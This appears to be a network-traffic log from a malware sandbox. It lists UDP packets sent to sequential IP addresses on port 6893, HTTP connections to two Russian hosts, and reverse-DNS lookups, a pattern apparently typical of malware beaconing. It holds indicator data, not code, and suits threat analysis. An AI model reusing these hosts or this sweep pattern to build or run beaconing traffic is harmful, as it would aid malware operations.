TR 95.1.200.17:6893 udp
TR 95.1.200.18:6893 udp
TR 95.1.200.19:6893 udp
TR 95.1.200.20:6893 udp
TR 95.1.200.21:6893 udp
TR 95.1.200.22:6893 udp
TR 95.1.200.23:6893 udp
TR 95.1.200.24:6893 udp
TR 95.1.200.25:6893 udp
TR 95.1.200.26:6893 udp
TR 95.1.200.27:6893 udp
TR 95.1.200.28:6893 udp
TR 95.1.200.29:6893 udp
TR 95.1.200.30:6893 udp
TR 95.1.200.31:6893 udp
FR 87.98.176.0:6893 udp
FR 87.98.176.1:6893 udp
FR 87.98.176.2:6893 udp
FR 87.98.176.3:6893 udp
FR 87.98.176.4:6893 udp
FR 87.98.176.5:6893 udp
FR 87.98.176.6:6893 udp
FR 87.98.176.7:6893 udp
FR 87.98.176.8:6893 udp
FR 87.98.176.9:6893 udp
FR 87.98.176.10:6893 udp
FR 87.98.176.11:6893 udp
FR 87.98.176.12:6893 udp
FR 87.98.176.13:6893 udp
FR 87.98.176.14:6893 udp
FR 87.98.176.15:6893 udp
FR 87.98.176.16:6893 udp
FR 87.98.176.17:6893 udp
FR 87.98.176.18:6893 udp
FR 87.98.176.19:6893 udp
FR 87.98.176.20:6893 udp
FR 87.98.176.21:6893 udp
FR 87.98.176.22:6893 udp
FR 87.98.176.23:6893 udp
FR 87.98.176.24:6893 udp
FR 87.98.176.25:6893 udp
FR 87.98.176.26:6893 udp
FR 87.98.176.27:6893 udp
FR 87.98.176.28:6893 udp
FR 87.98.176.29:6893 udp
FR 87.98.176.30:6893 udp
FR 87.98.176.31:6893 udp
FR 87.98.176.32:6893 udp
FR 87.98.176.33:6893 udp
FR 87.98.176.34:6893 udp
FR 87.98.176.35:6893 udp
FR 87.98.176.36:6893 udp
FR 87.98.176.37:6893 udp
FR 87.98.176.38:6893 udp
FR 87.98.176.39:6893 udp
FR 87.98.176.40:6893 udp
FR 87.98.176.41:6893 udp
FR 87.98.176.42:6893 udp
FR 87.98.176.43:6893 udp
FR 87.98.176.44:6893 udp
FR 87.98.176.45:6893 udp
FR 87.98.176.46:6893 udp
FR 87.98.176.47:6893 udp
FR 87.98.176.48:6893 udp
FR 87.98.176.49:6893 udp
FR 87.98.176.50:6893 udp
FR 87.98.176.51:6893 udp
FR 87.98.176.52:6893 udp
FR 87.98.176.53:6893 udp
FR 87.98.176.54:6893 udp
FR 87.98.176.55:6893 udp
FR 87.98.176.56:6893 udp
FR 87.98.176.57:6893 udp
FR 87.98.176.58:6893 udp
FR 87.98.176.59:6893 udp
FR 87.98.176.60:6893 udp
FR 87.98.176.61:6893 udp
FR 87.98.176.62:6893 udp
FR 87.98.176.63:6893 udp
FR 87.98.176.64:6893 udp
FR 87.98.176.65:6893 udp
FR 87.98.176.66:6893 udp
FR 87.98.176.67:6893 udp
FR 87.98.176.68:6893 udp
FR 87.98.176.69:6893 udp
FR 87.98.176.70:6893 udp
FR 87.98.176.71:6893 udp
FR 87.98.176.72:6893 udp
FR 87.98.176.73:6893 udp
FR 87.98.176.74:6893 udp
FR 87.98.176.75:6893 udp
FR 87.98.176.76:6893 udp
FR 87.98.176.77:6893 udp
FR 87.98.176.78:6893 udp
FR 87.98.176.79:6893 udp
FR 87.98.176.80:6893 udp
FR 87.98.176.81:6893 udp
FR 87.98.176.82:6893 udp
FR 87.98.176.83:6893 udp
FR 87.98.176.84:6893 udp
FR 87.98.176.85:6893 udp
FR 87.98.176.86:6893 udp
FR 87.98.176.87:6893 udp
FR 87.98.176.88:6893 udp
FR 87.98.176.89:6893 udp
FR 87.98.176.90:6893 udp
FR 87.98.176.91:6893 udp
FR 87.98.176.92:6893 udp
FR 87.98.176.93:6893 udp
FR 87.98.176.94:6893 udp
FR 87.98.176.95:6893 udp
FR 87.98.176.96:6893 udp
FR 87.98.176.97:6893 udp
FR 87.98.176.98:6893 udp
FR 87.98.176.99:6893 udp
FR 87.98.176.100:6893 udp
FR 87.98.176.101:6893 udp
FR 87.98.176.102:6893 udp
FR 87.98.176.103:6893 udp
FR 87.98.176.104:6893 udp
FR 87.98.176.105:6893 udp
FR 87.98.176.106:6893 udp
FR 87.98.176.107:6893 udp
FR 87.98.176.108:6893 udp
FR 87.98.176.109:6893 udp
FR 87.98.176.110:6893 udp
FR 87.98.176.111:6893 udp
FR 87.98.176.112:6893 udp
FR 87.98.176.113:6893 udp
FR 87.98.176.114:6893 udp
FR 87.98.176.115:6893 udp
FR 87.98.176.116:6893 udp
FR 87.98.176.117:6893 udp
FR 87.98.176.118:6893 udp
FR 87.98.176.119:6893 udp
FR 87.98.176.120:6893 udp
FR 87.98.176.121:6893 udp
FR 87.98.176.122:6893 udp
FR 87.98.176.123:6893 udp
FR 87.98.176.124:6893 udp
FR 87.98.176.125:6893 udp
FR 87.98.176.126:6893 udp
FR 87.98.176.127:6893 udp
FR 87.98.176.128:6893 udp
FR 87.98.176.129:6893 udp
FR 87.98.176.130:6893 udp
FR 87.98.176.131:6893 udp
FR 87.98.176.132:6893 udp
FR 87.98.176.133:6893 udp
FR 87.98.176.134:6893 udp
FR 87.98.176.135:6893 udp
FR 87.98.176.136:6893 udp
FR 87.98.176.137:6893 udp
FR 87.98.176.138:6893 udp
FR 87.98.176.139:6893 udp
FR 87.98.176.140:6893 udp
FR 87.98.176.141:6893 udp
FR 87.98.176.142:6893 udp
FR 87.98.176.143:6893 udp
FR 87.98.176.144:6893 udp
FR 87.98.176.145:6893 udp
FR 87.98.176.146:6893 udp
FR 87.98.176.147:6893 udp
FR 87.98.176.148:6893 udp
FR 87.98.176.149:6893 udp
FR 87.98.176.150:6893 udp
FR 87.98.176.151:6893 udp
FR 87.98.176.152:6893 udp
FR 87.98.176.153:6893 udp
FR 87.98.176.154:6893 udp
FR 87.98.176.155:6893 udp
FR 87.98.176.156:6893 udp
FR 87.98.176.157:6893 udp
FR 87.98.176.158:6893 udp
FR 87.98.176.159:6893 udp
FR 87.98.176.160:6893 udp
FR 87.98.176.161:6893 udp
FR 87.98.176.162:6893 udp
FR 87.98.176.163:6893 udp
FR 87.98.176.164:6893 udp
FR 87.98.176.165:6893 udp
FR 87.98.176.166:6893 udp
FR 87.98.176.167:6893 udp
FR 87.98.176.168:6893 udp
FR 87.98.176.169:6893 udp
FR 87.98.176.170:6893 udp
FR 87.98.176.171:6893 udp
FR 87.98.176.172:6893 udp
FR 87.98.176.173:6893 udp
FR 87.98.176.174:6893 udp
FR 87.98.176.175:6893 udp
FR 87.98.176.176:6893 udp
FR 87.98.176.177:6893 udp
FR 87.98.176.178:6893 udp
FR 87.98.176.179:6893 udp
FR 87.98.176.180:6893 udp
FR 87.98.176.181:6893 udp
FR 87.98.176.182:6893 udp
FR 87.98.176.183:6893 udp
FR 87.98.176.184:6893 udp
FR 87.98.176.185:6893 udp
FR 87.98.176.186:6893 udp
FR 87.98.176.187:6893 udp
FR 87.98.176.188:6893 udp
FR 87.98.176.189:6893 udp
FR 87.98.176.190:6893 udp
FR 87.98.176.191:6893 udp
FR 87.98.176.192:6893 udp
FR 87.98.176.193:6893 udp
FR 87.98.176.194:6893 udp
FR 87.98.176.195:6893 udp
FR 87.98.176.196:6893 udp
FR 87.98.176.197:6893 udp
FR 87.98.176.198:6893 udp
FR 87.98.176.199:6893 udp
FR 87.98.176.200:6893 udp
FR 87.98.176.201:6893 udp
FR 87.98.176.202:6893 udp
FR 87.98.176.203:6893 udp
FR 87.98.176.204:6893 udp
FR 87.98.176.205:6893 udp
FR 87.98.176.206:6893 udp
FR 87.98.176.207:6893 udp
FR 87.98.176.208:6893 udp
FR 87.98.176.209:6893 udp
FR 87.98.176.210:6893 udp
FR 87.98.176.211:6893 udp
FR 87.98.176.212:6893 udp
FR 87.98.176.213:6893 udp
FR 87.98.176.214:6893 udp
FR 87.98.176.215:6893 udp
FR 87.98.176.216:6893 udp
FR 87.98.176.217:6893 udp
FR 87.98.176.218:6893 udp
FR 87.98.176.219:6893 udp
FR 87.98.176.220:6893 udp
FR 87.98.176.221:6893 udp
FR 87.98.176.222:6893 udp
FR 87.98.176.223:6893 udp
FR 87.98.176.224:6893 udp
FR 87.98.176.225:6893 udp
FR 87.98.176.226:6893 udp
FR 87.98.176.227:6893 udp
FR 87.98.176.228:6893 udp
FR 87.98.176.229:6893 udp
FR 87.98.176.230:6893 udp
FR 87.98.176.231:6893 udp
FR 87.98.176.232:6893 udp
FR 87.98.176.233:6893 udp
FR 87.98.176.234:6893 udp
FR 87.98.176.235:6893 udp
FR 87.98.176.236:6893 udp
FR 87.98.176.237:6893 udp
FR 87.98.176.238:6893 udp
FR 87.98.176.239:6893 udp
FR 87.98.176.240:6893 udp
FR 87.98.176.241:6893 udp
FR 87.98.176.242:6893 udp
FR 87.98.176.243:6893 udp
FR 87.98.176.244:6893 udp
FR 87.98.176.245:6893 udp
FR 87.98.176.246:6893 udp
FR 87.98.176.247:6893 udp
FR 87.98.176.248:6893 udp
FR 87.98.176.249:6893 udp
FR 87.98.176.250:6893 udp
FR 87.98.176.251:6893 udp
FR 87.98.176.252:6893 udp
FR 87.98.176.253:6893 udp
FR 87.98.176.254:6893 udp
RU 91.218.114.11:80 91.218.114.11 tcp
RU 91.218.114.25:80 91.218.114.25 tcp
US 8.8.8.8:53 0.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 11.114.218.91.in-addr.arpa udp
US 8.8.8.8:53 1.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 2.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 4.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 3.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 5.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 6.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 7.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 8.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 9.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 10.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 11.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 12.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 13.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 15.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 14.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 16.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 17.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 18.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 20.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 19.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 21.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 22.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 23.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 25.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 27.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 29.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 30.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 0.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 2.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 3.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 5.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 7.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 6.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 4.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 1.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 31.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 28.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 26.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 24.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 8.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 9.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 10.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 11.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 12.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 13.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 14.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 15.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 16.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 17.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 19.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 18.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 20.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 21.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 22.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 23.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 24.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 25.200.1.95.in-addr.arpa udp
FR 87.98.176.255:6893 udp
FR 87.98.177.0:6893 udp
FR 87.98.177.1:6893 udp
FR 87.98.177.2:6893 udp
FR 87.98.177.3:6893 udp
FR 87.98.177.4:6893 udp
FR 87.98.177.5:6893 udp
FR 87.98.177.6:6893 udp
FR 87.98.177.7:6893 udp
FR 87.98.177.8:6893 udp
FR 87.98.177.9:6893 udp
FR 87.98.177.10:6893 udp
FR 87.98.177.11:6893 udp
FR 87.98.177.12:6893 udp
FR 87.98.177.13:6893 udp
FR 87.98.177.14:6893 udp
FR 87.98.177.15:6893 udp
FR 87.98.177.16:6893 udp
FR 87.98.177.17:6893 udp
FR 87.98.177.18:6893 udp
FR 87.98.177.19:6893 udp
FR 87.98.177.20:6893 udp
FR 87.98.177.21:6893 udp
FR 87.98.177.22:6893 udp
FR 87.98.177.23:6893 udp
FR 87.98.177.24:6893 udp
FR 87.98.177.25:6893 udp
FR 87.98.177.26:6893 udp
FR 87.98.177.27:6893 udp
FR 87.98.177.28:6893 udp
FR 87.98.177.29:6893 udp
FR 87.98.177.30:6893 udp
FR 87.98.177.31:6893 udp
FR 87.98.177.32:6893 udp
FR 87.98.177.33:6893 udp
FR 87.98.177.34:6893 udp
FR 87.98.177.35:6893 udp
FR 87.98.177.36:6893 udp
FR 87.98.177.37:6893 udp
FR 87.98.177.38:6893 udp
FR 87.98.177.39:6893 udp
FR 87.98.177.40:6893 udp
FR 87.98.177.41:6893 udp
FR 87.98.177.42:6893 udp
FR 87.98.177.43:6893 udp
FR 87.98.177.44:6893 udp
FR 87.98.177.45:6893 udp
FR 87.98.177.46:6893 udp
FR 87.98.177.47:6893 udp
FR 87.98.177.48:6893 udp
FR 87.98.177.49:6893 udp
FR 87.98.177.50:6893 udp
FR 87.98.177.51:6893 udp
FR 87.98.177.52:6893 udp
FR 87.98.177.53:6893 udp
FR 87.98.177.54:6893 udp
FR 87.98.177.55:6893 udp
FR 87.98.177.56:6893 udp
FR 87.98.177.57:6893 udp
FR 87.98.177.58:6893 udp
FR 87.98.177.59:6893 udp
FR 87.98.177.60:6893 udp
FR 87.98.177.61:6893 udp
FR 87.98.177.62:6893 udp
FR 87.98.177.63:6893 udp
FR 87.98.177.64:6893 udp
FR 87.98.177.65:6893 udp
FR 87.98.177.66:6893 udp
FR 87.98.177.67:6893 udp
FR 87.98.177.68:6893 udp
FR 87.98.177.69:6893 udp
FR 87.98.177.70:6893 udp
FR 87.98.177.71:6893 udp
FR 87.98.177.72:6893 udp
FR 87.98.177.73:6893 udp
FR 87.98.177.74:6893 udp
FR 87.98.177.75:6893 udp
FR 87.98.177.76:6893 udp
FR 87.98.177.77:6893 udp
FR 87.98.177.78:6893 udp
FR 87.98.177.79:6893 udp
FR 87.98.177.80:6893 udp
FR 87.98.177.81:6893 udp
FR 87.98.177.82:6893 udp
FR 87.98.177.83:6893 udp
FR 87.98.177.84:6893 udp
FR 87.98.177.85:6893 udp
FR 87.98.177.86:6893 udp
FR 87.98.177.87:6893 udp
FR 87.98.177.88:6893 udp
FR 87.98.177.89:6893 udp
FR 87.98.177.90:6893 udp
FR 87.98.177.91:6893 udp
FR 87.98.177.92:6893 udp
FR 87.98.177.93:6893 udp
FR 87.98.177.94:6893 udp
FR 87.98.177.95:6893 udp
FR 87.98.177.96:6893 udp
FR 87.98.177.97:6893 udp
FR 87.98.177.98:6893 udp
FR 87.98.177.99:6893 udp
FR 87.98.177.100:6893 udp
FR 87.98.177.101:6893 udp
FR 87.98.177.102:6893 udp
FR 87.98.177.103:6893 udp
FR 87.98.177.104:6893 udp
FR 87.98.177.105:6893 udp
FR 87.98.177.106:6893 udp
FR 87.98.177.107:6893 udp
FR 87.98.177.108:6893 udp
FR 87.98.177.109:6893 udp
FR 87.98.177.110:6893 udp
FR 87.98.177.111:6893 udp
FR 87.98.177.112:6893 udp
FR 87.98.177.113:6893 udp
FR 87.98.177.114:6893 udp
FR 87.98.177.115:6893 udp
FR 87.98.177.116:6893 udp
FR 87.98.177.117:6893 udp
FR 87.98.177.118:6893 udp
FR 87.98.177.119:6893 udp
FR 87.98.177.120:6893 udp
FR 87.98.177.121:6893 udp
FR 87.98.177.122:6893 udp
FR 87.98.177.123:6893 udp
FR 87.98.177.124:6893 udp
FR 87.98.177.125:6893 udp
FR 87.98.177.126:6893 udp
FR 87.98.177.127:6893 udp
FR 87.98.177.128:6893 udp
FR 87.98.177.129:6893 udp
FR 87.98.177.130:6893 udp
FR 87.98.177.131:6893 udp
FR 87.98.177.132:6893 udp
FR 87.98.177.133:6893 udp
FR 87.98.177.134:6893 udp
FR 87.98.177.135:6893 udp
FR 87.98.177.136:6893 udp
FR 87.98.177.137:6893 udp
FR 87.98.177.138:6893 udp
FR 87.98.177.139:6893 udp
FR 87.98.177.140:6893 udp
FR 87.98.177.141:6893 udp
FR 87.98.177.142:6893 udp
FR 87.98.177.143:6893 udp
FR 87.98.177.144:6893 udp
FR 87.98.177.145:6893 udp
FR 87.98.177.146:6893 udp
FR 87.98.177.147:6893 udp
FR 87.98.177.148:6893 udp
FR 87.98.177.149:6893 udp
FR 87.98.177.150:6893 udp
FR 87.98.177.151:6893 udp
FR 87.98.177.152:6893 udp
FR 87.98.177.153:6893 udp
FR 87.98.177.154:6893 udp
FR 87.98.177.155:6893 udp
FR 87.98.177.156:6893 udp
FR 87.98.177.157:6893 udp
FR 87.98.177.158:6893 udp
FR 87.98.177.159:6893 udp
FR 87.98.177.160:6893 udp
FR 87.98.177.161:6893 udp
FR 87.98.177.162:6893 udp
FR 87.98.177.163:6893 udp
FR 87.98.177.164:6893 udp
FR 87.98.177.165:6893 udp
FR 87.98.177.166:6893 udp
FR 87.98.177.167:6893 udp
FR 87.98.177.168:6893 udp
FR 87.98.177.169:6893 udp
FR 87.98.177.170:6893 udp
FR 87.98.177.171:6893 udp
FR 87.98.177.172:6893 udp
FR 87.98.177.173:6893 udp
FR 87.98.177.174:6893 udp
FR 87.98.177.175:6893 udp
FR 87.98.177.176:6893 udp
FR 87.98.177.177:6893 udp
FR 87.98.177.178:6893 udp
FR 87.98.177.179:6893 udp
FR 87.98.177.180:6893 udp
FR 87.98.177.181:6893 udp
FR 87.98.177.182:6893 udp
FR 87.98.177.183:6893 udp
FR 87.98.177.184:6893 udp
FR 87.98.177.185:6893 udp
FR 87.98.177.186:6893 udp
FR 87.98.177.187:6893 udp
FR 87.98.177.188:6893 udp
FR 87.98.177.189:6893 udp
FR 87.98.177.190:6893 udp
FR 87.98.177.191:6893 udp
FR 87.98.177.192:6893 udp
FR 87.98.177.193:6893 udp
FR 87.98.177.194:6893 udp
FR 87.98.177.195:6893 udp
FR 87.98.177.196:6893 udp
FR 87.98.177.197:6893 udp
FR 87.98.177.198:6893 udp
FR 87.98.177.199:6893 udp
FR 87.98.177.200:6893 udp
FR 87.98.177.201:6893 udp
FR 87.98.177.202:6893 udp
FR 87.98.177.203:6893 udp
FR 87.98.177.204:6893 udp
FR 87.98.177.205:6893 udp
FR 87.98.177.206:6893 udp
FR 87.98.177.207:6893 udp
FR 87.98.177.208:6893 udp
FR 87.98.177.209:6893 udp
FR 87.98.177.210:6893 udp
FR 87.98.177.211:6893 udp
FR 87.98.177.212:6893 udp
FR 87.98.177.213:6893 udp
FR 87.98.177.214:6893 udp
FR 87.98.177.215:6893 udp
FR 87.98.177.216:6893 udp
FR 87.98.177.217:6893 udp
FR 87.98.177.218:6893 udp
FR 87.98.177.219:6893 udp
FR 87.98.177.220:6893 udp
FR 87.98.177.221:6893 udp
FR 87.98.177.222:6893 udp
FR 87.98.177.223:6893 udp
FR 87.98.177.224:6893 udp
FR 87.98.177.225:6893 udp
FR 87.98.177.226:6893 udp
FR 87.98.177.227:6893 udp
FR 87.98.177.228:6893 udp
FR 87.98.177.229:6893 udp
FR 87.98.177.230:6893 udp
FR 87.98.177.231:6893 udp
FR 87.98.177.232:6893 udp
FR 87.98.177.233:6893 udp
FR 87.98.177.234:6893 udp
FR 87.98.177.235:6893 udp
FR 87.98.177.236:6893 udp
FR 87.98.177.237:6893 udp
FR 87.98.177.238:6893 udp
FR 87.98.177.239:6893 udp
FR 87.98.177.240:6893 udp
FR 87.98.177.241:6893 udp
FR 87.98.177.242:6893 udp
FR 87.98.177.243:6893 udp
FR 87.98.177.244:6893 udp
FR 87.98.177.245:6893 udp
FR 87.98.177.246:6893 udp
FR 87.98.177.247:6893 udp
FR 87.98.177.248:6893 udp
FR 87.98.177.249:6893 udp
FR 87.98.177.250:6893 udp
FR 87.98.177.251:6893 udp
FR 87.98.177.252:6893 udp
FR 87.98.177.253:6893 udp
FR 87.98.177.254:6893 udp
US 8.8.8.8:53 26.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 27.200.1.95.in-addr.arpa udp
RU 91.218.114.25:80 91.218.114.25 tcp
US 8.8.8.8:53 28.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 29.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 30.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 31.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 0.176.98.87.in-addr.arpa udp
FR 87.98.177.255:6893 udp
FR 87.98.178.0:6893 udp
FR 87.98.178.1:6893 udp
FR 87.98.178.2:6893 udp
FR 87.98.178.3:6893 udp
FR 87.98.178.4:6893 udp
FR 87.98.178.5:6893 udp
FR 87.98.178.6:6893 udp
FR 87.98.178.7:6893 udp
FR 87.98.178.8:6893 udp
FR 87.98.178.9:6893 udp
FR 87.98.178.10:6893 udp
FR 87.98.178.11:6893 udp
FR 87.98.178.12:6893 udp
FR 87.98.178.13:6893 udp
FR 87.98.178.14:6893 udp
FR 87.98.178.15:6893 udp
FR 87.98.178.16:6893 udp
FR 87.98.178.17:6893 udp
FR 87.98.178.18:6893 udp
FR 87.98.178.19:6893 udp
FR 87.98.178.20:6893 udp
FR 87.98.178.21:6893 udp
FR 87.98.178.22:6893 udp
FR 87.98.178.23:6893 udp
FR 87.98.178.24:6893 udp
FR 87.98.178.25:6893 udp
FR 87.98.178.26:6893 udp
FR 87.98.178.27:6893 udp
FR 87.98.178.28:6893 udp
FR 87.98.178.29:6893 udp
FR 87.98.178.30:6893 udp
US 8.8.8.8:53 1.176.98.87.in-addr.arpa udp
FR 87.98.178.31:6893 udp
FR 87.98.178.32:6893 udp
FR 87.98.178.33:6893 udp
FR 87.98.178.34:6893 udp
FR 87.98.178.35:6893 udp
FR 87.98.178.36:6893 udp
FR 87.98.178.37:6893 udp
FR 87.98.178.38:6893 udp
FR 87.98.178.39:6893 udp
FR 87.98.178.40:6893 udp
FR 87.98.178.41:6893 udp
FR 87.98.178.42:6893 udp
FR 87.98.178.43:6893 udp
FR 87.98.178.44:6893 udp
FR 87.98.178.45:6893 udp
FR 87.98.178.46:6893 udp
FR 87.98.178.47:6893 udp
FR 87.98.178.48:6893 udp
FR 87.98.178.49:6893 udp
FR 87.98.178.50:6893 udp
FR 87.98.178.51:6893 udp
FR 87.98.178.52:6893 udp
FR 87.98.178.53:6893 udp
FR 87.98.178.54:6893 udp
FR 87.98.178.55:6893 udp
FR 87.98.178.56:6893 udp
FR 87.98.178.57:6893 udp
FR 87.98.178.58:6893 udp
FR 87.98.178.59:6893 udp
FR 87.98.178.60:6893 udp
FR 87.98.178.61:6893 udp
FR 87.98.178.62:6893 udp
FR 87.98.178.63:6893 udp
FR 87.98.178.64:6893 udp
FR 87.98.178.65:6893 udp
FR 87.98.178.66:6893 udp
FR 87.98.178.67:6893 udp
FR 87.98.178.68:6893 udp
FR 87.98.178.69:6893 udp
FR 87.98.178.70:6893 udp
FR 87.98.178.71:6893 udp
FR 87.98.178.72:6893 udp
FR 87.98.178.73:6893 udp
FR 87.98.178.74:6893 udp
FR 87.98.178.75:6893 udp
FR 87.98.178.76:6893 udp
FR 87.98.178.77:6893 udp
FR 87.98.178.78:6893 udp
FR 87.98.178.79:6893 udp
FR 87.98.178.80:6893 udp
FR 87.98.178.81:6893 udp
FR 87.98.178.82:6893 udp
FR 87.98.178.83:6893 udp
FR 87.98.178.84:6893 udp
FR 87.98.178.85:6893 udp
FR 87.98.178.86:6893 udp
FR 87.98.178.87:6893 udp
FR 87.98.178.88:6893 udp
FR 87.98.178.89:6893 udp
FR 87.98.178.90:6893 udp
FR 87.98.178.91:6893 udp
FR 87.98.178.92:6893 udp
FR 87.98.178.93:6893 udp
FR 87.98.178.94:6893 udp
FR 87.98.178.95:6893 udp
FR 87.98.178.96:6893 udp
FR 87.98.178.97:6893 udp
FR 87.98.178.98:6893 udp
FR 87.98.178.99:6893 udp
FR 87.98.178.100:6893 udp
FR 87.98.178.101:6893 udp
FR 87.98.178.102:6893 udp
FR 87.98.178.103:6893 udp
FR 87.98.178.104:6893 udp
FR 87.98.178.105:6893 udp
FR 87.98.178.106:6893 udp
FR 87.98.178.107:6893 udp
FR 87.98.178.108:6893 udp
FR 87.98.178.109:6893 udp
FR 87.98.178.110:6893 udp
FR 87.98.178.111:6893 udp
FR 87.98.178.112:6893 udp
FR 87.98.178.113:6893 udp
FR 87.98.178.114:6893 udp
FR 87.98.178.115:6893 udp
FR 87.98.178.116:6893 udp
FR 87.98.178.117:6893 udp
FR 87.98.178.118:6893 udp
FR 87.98.178.119:6893 udp
FR 87.98.178.120:6893 udp
FR 87.98.178.121:6893 udp
FR 87.98.178.122:6893 udp
FR 87.98.178.123:6893 udp
FR 87.98.178.124:6893 udp
FR 87.98.178.125:6893 udp
FR 87.98.178.126:6893 udp
FR 87.98.178.127:6893 udp
FR 87.98.178.128:6893 udp
FR 87.98.178.129:6893 udp
FR 87.98.178.130:6893 udp
FR 87.98.178.131:6893 udp
FR 87.98.178.132:6893 udp
FR 87.98.178.133:6893 udp
FR 87.98.178.134:6893 udp
FR 87.98.178.135:6893 udp
FR 87.98.178.136:6893 udp
FR 87.98.178.137:6893 udp
FR 87.98.178.138:6893 udp
FR 87.98.178.139:6893 udp
FR 87.98.178.140:6893 udp
FR 87.98.178.141:6893 udp
FR 87.98.178.142:6893 udp
FR 87.98.178.143:6893 udp
FR 87.98.178.144:6893 udp
FR 87.98.178.145:6893 udp
FR 87.98.178.146:6893 udp
FR 87.98.178.147:6893 udp
FR 87.98.178.148:6893 udp
FR 87.98.178.149:6893 udp
FR 87.98.178.150:6893 udp
FR 87.98.178.151:6893 udp
FR 87.98.178.152:6893 udp
FR 87.98.178.153:6893 udp
FR 87.98.178.154:6893 udp
FR 87.98.178.155:6893 udp
FR 87.98.178.156:6893 udp
FR 87.98.178.157:6893 udp
FR 87.98.178.158:6893 udp
FR 87.98.178.159:6893 udp
FR 87.98.178.160:6893 udp
FR 87.98.178.161:6893 udp
FR 87.98.178.162:6893 udp
FR 87.98.178.163:6893 udp
FR 87.98.178.164:6893 udp
FR 87.98.178.165:6893 udp
FR 87.98.178.166:6893 udp
FR 87.98.178.167:6893 udp
FR 87.98.178.168:6893 udp
FR 87.98.178.169:6893 udp
FR 87.98.178.170:6893 udp
FR 87.98.178.171:6893 udp
FR 87.98.178.172:6893 udp
FR 87.98.178.173:6893 udp
FR 87.98.178.174:6893 udp
FR 87.98.178.175:6893 udp
FR 87.98.178.176:6893 udp
FR 87.98.178.177:6893 udp
FR 87.98.178.178:6893 udp
FR 87.98.178.179:6893 udp
FR 87.98.178.180:6893 udp
FR 87.98.178.181:6893 udp
FR 87.98.178.182:6893 udp
FR 87.98.178.183:6893 udp
FR 87.98.178.184:6893 udp
FR 87.98.178.185:6893 udp
FR 87.98.178.186:6893 udp
FR 87.98.178.187:6893 udp
FR 87.98.178.188:6893 udp
FR 87.98.178.189:6893 udp
FR 87.98.178.190:6893 udp
FR 87.98.178.191:6893 udp
FR 87.98.178.192:6893 udp
FR 87.98.178.193:6893 udp
FR 87.98.178.194:6893 udp
FR 87.98.178.195:6893 udp
FR 87.98.178.196:6893 udp
FR 87.98.178.197:6893 udp
FR 87.98.178.198:6893 udp
FR 87.98.178.199:6893 udp
FR 87.98.178.200:6893 udp
FR 87.98.178.201:6893 udp
FR 87.98.178.202:6893 udp
FR 87.98.178.203:6893 udp
FR 87.98.178.204:6893 udp
FR 87.98.178.205:6893 udp
FR 87.98.178.206:6893 udp
FR 87.98.178.207:6893 udp
FR 87.98.178.208:6893 udp
FR 87.98.178.209:6893 udp
FR 87.98.178.210:6893 udp
FR 87.98.178.211:6893 udp
FR 87.98.178.212:6893 udp
FR 87.98.178.213:6893 udp
FR 87.98.178.214:6893 udp
FR 87.98.178.215:6893 udp
FR 87.98.178.216:6893 udp
FR 87.98.178.217:6893 udp
FR 87.98.178.218:6893 udp
FR 87.98.178.219:6893 udp
FR 87.98.178.220:6893 udp
FR 87.98.178.221:6893 udp
FR 87.98.178.222:6893 udp
FR 87.98.178.223:6893 udp
FR 87.98.178.224:6893 udp
FR 87.98.178.225:6893 udp
FR 87.98.178.226:6893 udp
FR 87.98.178.227:6893 udp
